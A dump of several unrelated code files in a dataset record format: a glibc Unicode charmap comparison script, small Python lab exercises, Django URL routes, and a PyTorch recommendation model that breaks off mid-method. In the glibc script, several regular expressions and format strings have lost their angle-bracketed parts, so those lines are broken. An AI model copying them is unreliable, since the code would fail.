single code point in UnicodeData.txt looks\n like this:\n\n 0041;LATIN CAPITAL LETTER A;Lu;0;L;;;;;N;;;;0061;\n\n Code point ranges are indicated by pairs of lines like this:\n\n 4E00;;Lo;0;L;;;;;N;;;;;\n 9FCC;;Lo;0;L;;;;;N;;;;;\n '''\n with open(filename, mode='r') as unicode_data_file:\n fields_start = []\n for line in unicode_data_file:\n fields = line.strip().split(';')\n if len(fields) != 15:\n sys.stderr.write(\n 'short line in file \"%(f)s\": %(l)s\\n' %{\n 'f': filename, 'l': line})\n exit(1)\n if fields[2] == 'Cs':\n # Surrogates are UTF-16 artefacts,\n # not real characters. Ignore them.\n fields_start = []\n continue\n if fields[1].endswith(', First>'):\n fields_start = fields\n fields_start[1] = fields_start[1].split(',')[0][1:]\n continue\n if fields[1].endswith(', Last>'):\n fields[1] = fields[1].split(',')[0][1:]\n if fields[1:] != fields_start[1:]:\n sys.stderr.write(\n 'broken code point range in file \"%(f)s\": %(l)s\\n' %{\n 'f': filename, 'l': line})\n exit(1)\n for code_point in range(\n int(fields_start[0], 16),\n int(fields[0], 16)+1):\n fill_attribute(code_point, fields)\n fields_start = []\n continue\n fill_attribute(int(fields[0], 16), fields)\n fields_start = []\n\ndef fill_east_asian_widths(filename):\n '''Stores the entire contents of the EastAsianWidths.txt file\n in the EAST_ASIAN_WIDTHS dictionary.\n\n Lines in EastAsianWidths.txt are either a code point range like\n this:\n\n 9FCD..9FFF;W # Cn [51] ..\n\n or a single code point like this:\n\n A015;W # Lm YI SYLLABLE WU\n '''\n with open(filename, mode='r') as east_asian_widths_file:\n for line in east_asian_widths_file:\n match = re.match(\n r'^(?P[0-9A-F]{4,6})'\n +r'(?:\\.\\.(?P[0-9A-F]{4,6}))?'\n +r'\\s*;\\s*(?P[a-zA-Z]+)',\n line)\n if not match:\n continue\n start = match.group('codepoint1')\n end = match.group('codepoint2')\n if not end:\n end = start\n for code_point in range(int(start, 16), int(end, 16)+1):\n EAST_ASIAN_WIDTHS[code_point] = match.group('property')\n\ndef ucs_symbol(code_point):\n '''Return the UCS symbol string for a Unicode character.'''\n if code_point < 0x10000:\n return ''.format(code_point)\n else:\n return ''.format(code_point)\n\ndef create_charmap_dictionary(file_name):\n '''Create a dictionary for all code points found in the CHARMAP\n section of a file\n '''\n with open(file_name, mode='r') as utf8_file:\n charmap_dictionary = {}\n for line in utf8_file:\n if line.startswith('CHARMAP'):\n break\n for line in utf8_file:\n if line.startswith('END CHARMAP'):\n return charmap_dictionary\n if line.startswith('%'):\n continue\n match = re.match(\n r'^[0-9A-F]{4,8})>'\n +r'(:?\\.\\.[0-9-A-F]{4,8})>)?'\n +r'\\s+(?P(/x[0-9a-f]{2}){1,4})',\n line)\n if not match:\n continue\n codepoint1 = match.group('codepoint1')\n codepoint2 = match.group('codepoint2')\n if not codepoint2:\n codepoint2 = codepoint1\n for i in range(int(codepoint1, 16),\n int(codepoint2, 16) + 1):\n charmap_dictionary[i] = match.group('hexutf8')\n sys.stderr.write('No “CHARMAP” or no “END CHARMAP” found in %s\\n'\n %file_name)\n exit(1)\n\ndef check_charmap(original_file_name, new_file_name):\n '''Report differences in the CHARMAP section between the old and the\n new file\n '''\n print('************************************************************')\n print('Report on CHARMAP:')\n ocharmap = create_charmap_dictionary(original_file_name)\n ncharmap = create_charmap_dictionary(new_file_name)\n print('------------------------------------------------------------')\n print('Total removed characters in newly generated CHARMAP: %d'\n %len(set(ocharmap)-set(ncharmap)))\n if ARGS.show_missing_characters:\n for key in sorted(set(ocharmap)-set(ncharmap)):\n print('removed: {:s} {:s} {:s}'.format(\n ucs_symbol(key),\n ocharmap[key],\n UNICODE_ATTRIBUTES[key]['name'] \\\n if key in UNICODE_ATTRIBUTES else None))\n print('------------------------------------------------------------')\n changed_charmap = {}\n for key in set(ocharmap).intersection(set(ncharmap)):\n if ocharmap[key] != ncharmap[key]:\n changed_charmap[key] = (ocharmap[key], ncharmap[key])\n print('Total changed characters in newly generated CHARMAP: %d'\n %len(changed_charmap))\n if ARGS.show_changed_characters:\n for key in sorted(changed_charmap):\n print('changed: {:s} {:s}->{:s} {:s}'.format(\n ucs_symbol(key),\n changed_charmap[key][0],\n changed_charmap[key][1],\n UNICODE_ATTRIBUTES[key]['name'] \\\n if key in UNICODE_ATTRIBUTES else None))\n print('------------------------------------------------------------')\n print('Total added characters in newly generated CHARMAP: %d'\n %len(set(ncharmap)-set(ocharmap)))\n if ARGS.show_added_characters:\n for key in sorted(set(ncharmap)-set(ocharmap)):\n print('added: {:s} {:s} {:s}'.format(\n ucs_symbol(key),\n ncharmap[key],\n UNICODE_ATTRIBUTES[key]['name'] \\\n if key in UNICODE_ATTRIBUTES else None))\n\ndef create_width_dictionary(file_name):\n '''Create a dictionary for all code points found in the WIDTH\n section of a file\n '''\n with open(file_name, mode='r') as utf8_file:\n width_dictionary = {}\n for line in utf8_file:\n if line.startswith('WIDTH'):\n break\n for line in utf8_file:\n if line.startswith('END WIDTH'):\n return width_dictionary\n match = re.match(\n r'^[0-9A-F]{4,8})>'\n +r'(:?\\.\\.\\.[0-9-A-F]{4,8})>)?'\n +r'\\s+(?P[02])',\n line)\n if not match:\n continue\n codepoint1 = match.group('codepoint1')\n codepoint2 = match.group('codepoint2')\n if not codepoint2:\n codepoint2 = codepoint1\n for i in range(int(codepoint1, 16),\n int(codepoint2, 16) + 1):\n width_dictionary[i] = int(match.group('width'))\n sys.stderr.write('No “WIDTH” or no “END WIDTH” found in %s\\n' %file)\n\ndef check_width(original_file_name, new_file_name):\n '''Report differences in the WIDTH section between the old and the new\n file\n '''\n print('************************************************************')\n print('Report on WIDTH:')\n owidth = create_width_dictionary(original_file_name)\n nwidth = create_width_dictionary(new_file_name)\n print('------------------------------------------------------------')\n print('Total removed characters in newly generated WIDTH: %d'\n %len(set(owidth)-set(nwidth)))\n print('(Characters not in WIDTH get width 1 by default, '\n + 'i.e. these have width 1 now.)')\n if ARGS.show_missing_characters:\n for key in sorted(set(owidth)-set(nwidth)):\n print('removed: {:s} '.format(ucs_symbol(key))\n + '{:d} : '.format(owidth[key])\n + 'eaw={:s} '.format(\n EAST_ASIAN_WIDTHS[key]\n if key in EAST_ASIAN_WIDTHS else None)\n + 'category={:2s} '.format(\n UNICODE_ATTRIBUTES[key]['category']\n if key in UNICODE_ATTRIBUTES else None)\n + 'bidi={:3s} '.format(\n UNICODE_ATTRIBUTES[key]['bidi']\n if key in UNICODE_ATTRIBUTES else None)\n + 'name={:s}'.format(\n UNICODE_ATTRIBUTES[key]['name']\n if key in UNICODE_ATTRIBUTES else None))\n print('------------------------------------------------------------')\n changed_width = {}\n for key in set(owidth).intersection(set(nwidth)):\n if owidth[key] != nwidth[key]:\n changed_width[key] = (owidth[key], nwidth[key])\n print('Total changed characters in newly generated WIDTH: %d'\n %len(changed_width))\n if ARGS.show_changed_characters:\n for key in sorted(changed_width):\n print('changed width: {:s} '.format(ucs_symbol(key))\n + '{:d}->{:d} : '.format(changed_width[key][0],\n changed_width[key][1])\n + 'eaw={:s} '.format(\n EAST_ASIAN_WIDTHS[key]\n if key in EAST_ASIAN_WIDTHS else None)\n + 'category={:2s} '.format(\n UNICODE_ATTRIBUTES[key]['category']\n if key in UNICODE_ATTRIBUTES else None)\n + 'bidi={:3s} '.format(\n UNICODE_ATTRIBUTES[key]['bidi']\n if key in UNICODE_ATTRIBUTES else None)\n + 'name={:s}'.format(\n UNICODE_ATTRIBUTES[key]['name']\n if key in UNICODE_ATTRIBUTES else None))\n print('------------------------------------------------------------')\n print('Total added characters in newly generated WIDTH: %d'\n %len(set(nwidth)-set(owidth)))\n print('(Characters not in WIDTH get width 1 by default, '\n + 'i.e. these had width 1 before.)')\n if ARGS.show_added_characters:\n for key in sorted(set(nwidth)-set(owidth)):\n print('added: {:s} '.format(ucs_symbol(key))\n + '{:d} : '.format(nwidth[key])\n + 'eaw={:s} '.format(\n EAST_ASIAN_WIDTHS[key]\n if key in EAST_ASIAN_WIDTHS else None)\n + 'category={:2s} '.format(\n UNICODE_ATTRIBUTES[key]['category']\n if key in UNICODE_ATTRIBUTES else None)\n + 'bidi={:3s} '.format(\n UNICODE_ATTRIBUTES[key]['bidi']\n if key in UNICODE_ATTRIBUTES else None)\n + 'name={:s}'.format(\n UNICODE_ATTRIBUTES[key]['name']\n if key in UNICODE_ATTRIBUTES else None))\n\nif __name__ == \"__main__\":\n PARSER = argparse.ArgumentParser(\n description='''\n Compare the contents of LC_CTYPE in two files and check for errors.\n ''')\n PARSER.add_argument(\n '-o', '--old_utf8_file',\n nargs='?',\n required=True,\n type=str,\n help='The old UTF-8 file.')\n PARSER.add_argument(\n '-n', '--new_utf8_file',\n nargs='?',\n required=True,\n type=str,\n help='The new UTF-8 file.')\n PARSER.add_argument(\n '-u', '--unicode_data_file',\n nargs='?',\n type=str,\n help='The UnicodeData.txt file to read.')\n PARSER.add_argument(\n '-e', '--east_asian_width_file',\n nargs='?',\n type=str,\n help='The EastAsianWidth.txt file to read.')\n PARSER.add_argument(\n '-a', '--show_added_characters',\n action='store_true',\n help='Show characters which were added in detail.')\n PARSER.add_argument(\n '-m', '--show_missing_characters',\n action='store_true',\n help='Show characters which were removed in detail.')\n PARSER.add_argument(\n '-c', '--show_changed_characters',\n action='store_true',\n help='Show characters whose width was changed in detail.')\n ARGS = PARSER.parse_args()\n\n if ARGS.unicode_data_file:\n fill_attributes(ARGS.unicode_data_file)\n if ARGS.east_asian_width_file:\n fill_east_asian_widths(ARGS.east_asian_width_file)\n check_charmap(ARGS.old_utf8_file, ARGS.new_utf8_file)\n check_width(ARGS.old_utf8_file, ARGS.new_utf8_file)\n","repo_name":"lockedbyte/glibc_sources","sub_path":"glibc_2.22/localedata/unicode-gen/utf8_compatibility.py","file_name":"utf8_compatibility.py","file_ext":"py","file_size_in_byte":14905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19929423642","text":"import pandas as pd\nimport numpy as np\n\ndata=pd.read_csv('2.csv')\nrows=data.shape[0]\ncols=data.shape[1]-1\nconcepts = np.array(data.iloc[:,0:-1])\ntarget = np.array(data.iloc[:,-1])\nspec_h=list()\nfor i in range(rows):\n if data.iloc[i,cols]=='Yes':\n for j in data.iloc[i]:\n spec_h.append(j)\n break\nspec_h.pop()\ngen_h = [[\"?\" for i in range(cols)] for i in range(cols)]\nfor i, h in enumerate(concepts):\n if target[i] == \"Yes\":\n for x in range(cols):\n if h[x] != spec_h[x]:\n spec_h[x] = '?'\n gen_h[x][x] = '?'\n if target[i] == \"No\":\n for x in range(cols):\n if h[x] != spec_h[x]:\n gen_h[x][x] = spec_h[x]\n else:\n gen_h[x][x] = '?'\nindices = [i for i, val in enumerate(gen_h) if val == ['?', '?', '?', '?', '?', '?']]\nfor i in indices:\n gen_h.remove(['?', '?', '?', '?', '?', '?'])\nprint(\"Final Specific_h:\", spec_h, sep=\"\\n\")\nprint(\"Final General_h:\", gen_h, sep=\"\\n\")","repo_name":"raghuachar12/ML-LAB-","sub_path":"lab prg ml/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6475749288","text":"print('Enter number of students')\r\nnum=input()\r\nnum=int(num)\r\n\r\nstudents=[dict() for x in range(num)]\r\n\r\nfor i in range(num):\r\n print('Enter name')\r\n nam=input()\r\n students[i]['Name']=nam\r\n print('Enter Roll n.o')\r\n rno=int(input())\r\n students[i]['RollNo']=rno\r\n print('Enter Marks as a list')\r\n temp = input()\r\n Mrk=[]\r\n for k in range(len(temp)):\r\n if(temp[k]=='[' or temp[k]==']' or temp[k]==','):\r\n continue\r\n else:\r\n Mrk.append(temp[k])\r\n for j in range(len(Mrk)):\r\n Mrk[j]=int(Mrk[j])\r\n students[i]['Marks']=Mrk\r\n \r\nprint(\"\\nmenu\\na)Details of all the students\\nb)sum of all marks in descending order\\nc)student with maximum mark\")\r\nprint(\"d)student with minimum mark\\ne)student who is having average mark\\nf)exit\") \r\n\r\noption='z'\r\nwhile option!='f':\r\n option=input(\"\\nEnter the option\\n\")\r\n if(option=='a'):\r\n for i in range(num):\r\n print(\"Name:\",students[i]['Name'])\r\n print(\"Roll number:\",students[i]['RollNo'])\r\n print(\"Marks:\",end='')\r\n print(*students[i]['Marks'],sep=',')\r\n \r\n elif(option=='b'):\r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n summark.sort(reverse=True)\r\n print(*summark,sep=',')\r\n \r\n elif(option=='c'):\r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n \r\n for i in range(num):\r\n if(summark[i]==max(summark)):\r\n print(\"student name:\",students[i]['Name'])\r\n print(\"mark:\",summark[i])\r\n break;\r\n \r\n elif(option=='d'): \r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n \r\n for i in range(num):\r\n if(summark[i]==min(summark)):\r\n print(\"student name:\",students[i]['Name'])\r\n print(\"mark:\",summark[i])\r\n break; \r\n \r\n elif(option=='e'): \r\n summark=[]\r\n for i in range(num):\r\n summark.append(sum(students[i]['Marks']))\r\n \r\n for i in range(num):\r\n if(summark[i]==sum(summark)/num):\r\n print(\"student name:\",students[i]['Name'])\r\n print(\"mark:\",summark[i])\r\n break;\r\n else:\r\n print(\"student name:no student\")\r\n \r\n else:\r\n break;\r\n \r\n# CREDIT : https://github.com/adhi85/\r\n","repo_name":"adhi85/Student-Marking-System","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71422238954","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path, include\n\nfrom .views import *\n\napp_name = \"Users\"\n\nurlpatterns = [\n path(\"\", dashboard, name=\"dashboard\"),\n path('accounts/', include('django.contrib.auth.urls')),\n path(\"profile_list/\", profile_list, name=\"profile_list\"),\n path(\"profile/\", profile, name=\"profile\"),\n path(\"profile/\", profile, name=\"profile\"),\n path('login/', auth_views.LoginView.as_view(template_name='registration/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(template_name='registration/logout.html'), name='logout'),\n\n path('register/', register, name='register'),\n path('add_poems/', add_poems, name='add_poems'),\n #path('edit_poems/', edit_poems, name='edit_poems'),\n path('read_poems/', read_poems, name='read_poems'),\n path('my_account/', profile_view, name='my_account'),\n]\n","repo_name":"Nico3125/Poiesis_blog","sub_path":"Users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5812346778","text":"# -*- coding: utf-8 -*-\r\nimport torch\r\nfrom torch.optim import Adam\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.nn.functional import softmax\r\nimport numpy as np\r\nimport sys\r\nfrom DataSet import DataSetTrain, DataSetTestNext, DataSetTestNextNew\r\n\r\nimport logging\r\n\r\nFType = torch.FloatTensor\r\nLType = torch.LongTensor\r\n\r\nFORMAT = \"%(asctime)s - %(message)s\"\r\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\r\n\r\nNORM_METHOD = 'hour'\r\n\r\n\r\nclass HTSER_a:\r\n def __init__(self, file_path_tr, file_path_te_old, file_path_te_new, emb_size=128, neg_size=10,\r\n hist_len=2,\r\n user_count=992, item_count=5000, directed=True, learning_rate=0.001, decay=0.001, batch_size=1024,\r\n test_and_save_step=50, epoch_num=100, top_n=30, sample_time=3, sample_size=100,\r\n use_hist_attention=True, use_user_pref_attention=True, num_workers=0):\r\n self.emb_size = emb_size\r\n self.neg_size = neg_size\r\n self.hist_len = hist_len\r\n\r\n self.user_count = user_count\r\n self.item_count = item_count\r\n\r\n self.lr = learning_rate\r\n self.decay = decay\r\n self.batch = batch_size\r\n self.test_and_save_step = test_and_save_step\r\n self.epochs = epoch_num\r\n\r\n self.top_n = top_n\r\n self.sample_time = sample_time\r\n self.sample_size = sample_size\r\n\r\n self.directed = directed\r\n self.use_hist_attention = use_hist_attention\r\n self.use_user_pref_attention = use_user_pref_attention\r\n\r\n self.num_workers = num_workers\r\n\r\n self.temp_value1 = 0.0\r\n self.temp_value2 = 0.0\r\n\r\n logging.info('emb_size: {}'.format(emb_size))\r\n logging.info('neg_size: {}'.format(neg_size))\r\n logging.info('hist_len: {}'.format(hist_len))\r\n logging.info('user_count: {}'.format(user_count))\r\n logging.info('item_count: {}'.format(item_count))\r\n logging.info('lr: {}'.format(learning_rate))\r\n logging.info('epoch_num: {}'.format(epoch_num))\r\n logging.info('test_and_save_step: {}'.format(test_and_save_step))\r\n logging.info('batch: {}'.format(batch_size))\r\n logging.info('top_n: {}'.format(top_n))\r\n logging.info('sample_time: {}'.format(sample_time))\r\n logging.info('sample_size: {}'.format(sample_size))\r\n logging.info('directed: {}'.format(directed))\r\n logging.info('use_hist_attention: {}'.format(use_hist_attention))\r\n logging.info('use_user_pref_attention: {}'.format(use_user_pref_attention))\r\n\r\n self.data_tr = DataSetTrain(file_path_tr, user_count=self.user_count, item_count=self.item_count,\r\n neg_size=self.neg_size, hist_len=self.hist_len, directed=self.directed)\r\n self.data_te_old = DataSetTestNext(file_path_te_old, user_count=self.user_count, item_count=self.item_count,\r\n hist_len=self.hist_len, user_item_dict=self.data_tr.user_item_dict,\r\n directed=self.directed)\r\n self.data_te_new = DataSetTestNextNew(file_path_te_new, user_count=self.user_count, item_count=self.item_count,\r\n hist_len=self.hist_len, user_item_dict=self.data_tr.user_item_dict,\r\n directed=self.directed)\r\n\r\n self.node_dim = self.data_tr.get_node_dim()\r\n self.node_emb = torch.tensor(\r\n np.random.uniform(-0.5 / self.emb_size, 0.5 / self.emb_size, size=(self.node_dim, self.emb_size)),\r\n dtype=torch.float)\r\n self.delta = torch.ones(self.node_dim, dtype=torch.float)\r\n self.weight = torch.tensor(\r\n np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=(self.emb_size, self.emb_size)), dtype=torch.float)\r\n self.bias = torch.tensor(\r\n np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=self.emb_size), dtype=torch.float)\r\n\r\n self.long_short_pref_weight = torch.tensor(\r\n np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=(2*self.emb_size, 2)),\r\n dtype=torch.float)\r\n self.long_short_pref_bias = torch.tensor(np.random.normal(0, np.sqrt(2.0 / self.emb_size), size=2),\r\n dtype=torch.float)\r\n\r\n if torch.cuda.is_available():\r\n self.node_emb = self.node_emb.cuda()\r\n self.delta = self.delta.cuda()\r\n self.weight = self.weight.cuda()\r\n self.bias = self.bias.cuda()\r\n self.long_short_pref_weight = self.long_short_pref_weight.cuda()\r\n self.long_short_pref_bias = self.long_short_pref_bias.cuda()\r\n self.node_emb.requires_grad = True\r\n self.delta.requires_grad = True\r\n self.weight.requires_grad = True\r\n self.bias.requires_grad = True\r\n self.long_short_pref_weight.requires_grad = True\r\n self.long_short_pref_bias.requires_grad = True\r\n self.opt = Adam(lr=self.lr,\r\n params=[self.node_emb, self.delta, self.weight, self.bias, self.long_short_pref_weight,\r\n self.long_short_pref_bias], weight_decay=self.decay)\r\n self.loss = torch.FloatTensor()\r\n\r\n def forward(self, s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask):\r\n batch = s_nodes.size()[0]\r\n s_node_emb = torch.index_select(self.node_emb, 0, s_nodes.view(-1)).view(batch, -1)\r\n t_node_emb = torch.index_select(self.node_emb, 0, t_nodes.view(-1)).view(batch, -1)\r\n h_node_emb = torch.index_select(self.node_emb, 0, h_nodes.view(-1)).view(batch, self.hist_len, -1)\r\n hidden_h_node_emb = torch.relu(torch.matmul(h_node_emb, self.weight) + self.bias)\r\n attention = softmax((torch.mul(s_node_emb.unsqueeze(1), hidden_h_node_emb).sum(dim=2)), dim=1)\r\n p_mu = torch.mul(s_node_emb, t_node_emb).sum(dim=1)\r\n p_alpha = torch.mul(h_node_emb, t_node_emb.unsqueeze(1)).sum(dim=2)\r\n self.temp_array1 += p_alpha.mean(dim=0).data.cpu().numpy()\r\n\r\n self.delta.data.clamp_(min=1e-6)\r\n delta = torch.index_select(self.delta, 0, s_nodes.view(-1)).unsqueeze(1)\r\n d_time = torch.abs(t_times.unsqueeze(1) - h_times)\r\n\r\n d_time.data.clamp_(min=1e-6)\r\n\r\n if self.use_user_pref_attention:\r\n long_short_embedding = torch.cat([s_node_emb, torch.mean(h_node_emb, dim=1)], dim=1)\r\n pref_hidden = torch.softmax(torch.relu(\r\n torch.matmul(long_short_embedding, self.long_short_pref_weight) + self.long_short_pref_bias), dim=1)\r\n self.temp_value3 += pref_hidden[:, 0].mean().data\r\n self.temp_value4 += pref_hidden[:, 1].mean().data\r\n\r\n long_pref_weight = pref_hidden[:, 0]\r\n short_pref_weight = pref_hidden[:, 1]\r\n else:\r\n long_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n short_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n if torch.cuda.is_available():\r\n long_pref_weight = long_pref_weight.cuda()\r\n short_pref_weight = short_pref_weight.cuda()\r\n self.temp_value1 += long_pref_weight.mean().data\r\n self.temp_value2 += short_pref_weight.mean().data\r\n\r\n if self.use_hist_attention:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n attention * p_alpha * torch.exp(torch.neg(delta) * d_time) * h_time_mask).sum(dim=1)\r\n\r\n else:\r\n p_lambda = long_pref_weight * p_mu + short_pref_weight * (\r\n p_alpha * torch.exp(torch.neg(delta) * d_time) * h_time_mask).sum(dim=1)\r\n n_node_emb = torch.index_select(self.node_emb, 0, n_nodes.view(-1)).view(batch, self.neg_size, -1)\r\n n_mu = torch.mul(s_node_emb.unsqueeze(1), n_node_emb).sum(dim=2)\r\n n_alpha = torch.mul(h_node_emb.unsqueeze(2), n_node_emb.unsqueeze(1)).sum(dim=3)\r\n long_pref_weight = long_pref_weight.unsqueeze(1)\r\n short_pref_weight = short_pref_weight.unsqueeze(1)\r\n if self.use_hist_attention:\r\n n_lambda = long_pref_weight.detach() * n_mu + short_pref_weight.detach() * (\r\n attention.detach().unsqueeze(2) * n_alpha * (torch.exp(torch.neg(delta) * d_time).unsqueeze(2)) * (\r\n h_time_mask.unsqueeze(2))).sum(dim=1)\r\n else:\r\n n_lambda = long_pref_weight.detach() * n_mu + short_pref_weight.detach() * (\r\n n_alpha * (torch.exp(torch.neg(delta) * d_time).unsqueeze(2)) * (\r\n h_time_mask.unsqueeze(2))).sum(dim=1)\r\n\r\n self.temp_value5 += p_mu.mean().data\r\n self.temp_value6 += n_mu.mean().data\r\n return p_lambda, n_lambda\r\n\r\n def loss_func(self, s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask):\r\n p_lambdas, n_lambdas = self.forward(s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask)\r\n loss = -torch.log(torch.sigmoid(p_lambdas.unsqueeze(1)-n_lambdas)).sum(dim=1)\r\n return loss\r\n\r\n def update(self, s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask):\r\n self.opt.zero_grad()\r\n loss = self.loss_func(s_nodes, t_nodes, t_times, n_nodes, h_nodes, h_times, h_time_mask)\r\n loss = loss.sum()\r\n self.loss += loss.data\r\n loss.backward()\r\n self.opt.step()\r\n\r\n def train(self):\r\n self.epoch_temp = 0\r\n for epoch in range(self.epochs):\r\n self.epoch_temp = epoch\r\n self.temp_value1 = 0.0\r\n self.temp_value2 = 0.0\r\n self.temp_value3 = 0.0\r\n self.temp_value4 = 0.0\r\n self.temp_value5 = 0.0\r\n self.temp_value6 = 0.0\r\n self.temp_array1 = np.zeros(self.hist_len)\r\n self.loss = 0.0\r\n\r\n loader = DataLoader(self.data_tr, batch_size=self.batch, shuffle=True, num_workers=self.num_workers)\r\n for i_batch, sample_batched in enumerate(loader):\r\n\r\n if torch.cuda.is_available():\r\n self.update(sample_batched['source_node'].type(LType).cuda(),\r\n sample_batched['target_node'].type(LType).cuda(),\r\n sample_batched['target_time'].type(FType).cuda(),\r\n sample_batched['neg_nodes'].type(LType).cuda(),\r\n sample_batched['history_nodes'].type(LType).cuda(),\r\n sample_batched['history_times'].type(FType).cuda(),\r\n sample_batched['history_masks'].type(FType).cuda())\r\n else:\r\n self.update(sample_batched['source_node'].type(LType),\r\n sample_batched['target_node'].type(LType),\r\n sample_batched['target_time'].type(FType),\r\n sample_batched['neg_nodes'].type(LType),\r\n sample_batched['history_nodes'].type(LType),\r\n sample_batched['history_times'].type(FType),\r\n sample_batched['history_masks'].type(FType))\r\n\r\n sys.stdout.write('\\repoch ' + str(epoch) + ': avg loss = ' +\r\n str(self.loss.cpu().numpy() / len(self.data_tr)) + '\\n')\r\n sys.stdout.flush()\r\n if ((epoch + 1) % self.test_and_save_step == 0) or epoch == 0 or epoch == 4 or epoch == 9:\r\n self.recommend(epoch, is_new_item=False)\r\n self.recommend(epoch, is_new_item=True)\r\n print(\"long_pref_weight.mean(): {}\".format(self.temp_value1 / i_batch))\r\n print(\"short_pref_weight.mean(): {}\".format(self.temp_value2 / i_batch))\r\n print(\"long_pref_hidden.mean(): {}\".format(self.temp_value3 / i_batch))\r\n print(\"short_pref_hidden.mean(): {}\".format(self.temp_value4 / i_batch))\r\n print(\"alpha.mean(): {}\".format(self.temp_array1 / i_batch))\r\n print(\"p_mu.mean(): {}\".format(self.temp_value5 / i_batch))\r\n print(\"n_mu.mean(): {}\".format(self.temp_value6 / i_batch))\r\n print(\"==========================\")\r\n\r\n def recommend(self, epoch, is_new_item=False):\r\n count_all = 0\r\n rate_all_sum = 0\r\n recall_all_sum = np.zeros(self.top_n)\r\n MRR_all_sum = np.zeros(self.top_n)\r\n\r\n if is_new_item:\r\n loader = DataLoader(self.data_te_new, batch_size=self.batch, shuffle=False, num_workers=self.num_workers)\r\n else:\r\n loader = DataLoader(self.data_te_old, batch_size=self.batch, shuffle=False, num_workers=self.num_workers)\r\n for i_batch, sample_batched in enumerate(loader):\r\n if torch.cuda.is_available():\r\n rate_all, recall_all, MRR_all = \\\r\n self.evaluate(sample_batched['source_node'].type(LType).cuda(),\r\n sample_batched['target_node'].type(LType).cuda(),\r\n sample_batched['target_time'].type(FType).cuda(),\r\n sample_batched['history_nodes'].type(LType).cuda(),\r\n sample_batched['history_times'].type(FType).cuda(),\r\n sample_batched['history_masks'].type(FType).cuda())\r\n else:\r\n rate_all, recall_all, MRR_all = \\\r\n self.evaluate(sample_batched['source_node'].type(LType),\r\n sample_batched['target_node'].type(LType),\r\n sample_batched['target_time'].type(FType),\r\n sample_batched['history_nodes'].type(LType),\r\n sample_batched['history_times'].type(FType),\r\n sample_batched['history_masks'].type(FType))\r\n count_all += self.batch\r\n rate_all_sum += rate_all\r\n recall_all_sum += recall_all\r\n MRR_all_sum += MRR_all\r\n\r\n rate_all_sum_avg = rate_all_sum * 1. / count_all\r\n recall_all_avg = recall_all_sum * 1. / count_all\r\n MRR_all_avg = MRR_all_sum * 1. / count_all\r\n if is_new_item:\r\n logging.info('=========== testing next new item epoch: {} ==========='.format(epoch))\r\n logging.info('count_all_next_new: {}'.format(count_all))\r\n logging.info('rate_all_sum_avg_next_new: {}'.format(rate_all_sum_avg))\r\n logging.info('recall_all_avg_next_new: {}'.format(recall_all_avg))\r\n logging.info('MRR_all_avg_next_new: {}'.format(MRR_all_avg))\r\n else:\r\n logging.info('~~~~~~~~~~~~~ testing next item epoch: {} ~~~~~~~~~~~~~'.format(epoch))\r\n logging.info('count_all_next: {}'.format(count_all))\r\n logging.info('rate_all_sum_avg_next: {}'.format(rate_all_sum_avg))\r\n logging.info('recall_all_avg_next: {}'.format(recall_all_avg))\r\n logging.info('MRR_all_avg_next: {}'.format(MRR_all_avg))\r\n\r\n def evaluate(self, s_nodes, t_nodes, t_times, h_nodes, h_times, h_time_mask):\r\n batch = s_nodes.size()[0]\r\n all_item_index = torch.arange(0, self.item_count)\r\n if torch.cuda.is_available():\r\n all_item_index = all_item_index.cuda()\r\n all_node_emb = torch.index_select(self.node_emb, 0, all_item_index).detach()\r\n\r\n h_node_emb = torch.index_select(self.node_emb, 0, h_nodes.view(-1)).detach().view(batch, self.hist_len, -1)\r\n p_alpha = torch.matmul(h_node_emb, torch.transpose(all_node_emb, 0, 1))\r\n\r\n self.delta.data.clamp_(min=1e-6)\r\n\r\n d_time = torch.abs(t_times.unsqueeze(1) - h_times)\r\n\r\n delta = torch.index_select(self.delta, 0, s_nodes.view(-1)).detach().unsqueeze(1)\r\n s_node_emb = torch.index_select(self.node_emb, 0, s_nodes.view(-1)).detach().view(batch, -1)\r\n\r\n hidden_h_node_emb = torch.relu(torch.matmul(h_node_emb, self.weight.detach()) + self.bias.detach())\r\n attention = softmax((torch.mul(s_node_emb.unsqueeze(1), hidden_h_node_emb).sum(dim=2)), dim=1)\r\n p_mu = torch.matmul(s_node_emb, torch.transpose(all_node_emb, 0, 1))\r\n if self.use_user_pref_attention:\r\n long_short_embedding = torch.cat([s_node_emb, torch.mean(h_node_emb, dim=1)], dim=1)\r\n pref_hidden = torch.softmax(torch.relu(\r\n torch.matmul(long_short_embedding,\r\n self.long_short_pref_weight.detach()) + self.long_short_pref_bias.detach()), dim=1)\r\n long_pref_weight = pref_hidden[:, 0]\r\n short_pref_weight = pref_hidden[:, 1]\r\n else:\r\n long_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n short_pref_weight = torch.zeros(batch, dtype=torch.float) + 0.5\r\n if torch.cuda.is_available():\r\n long_pref_weight = long_pref_weight.cuda()\r\n 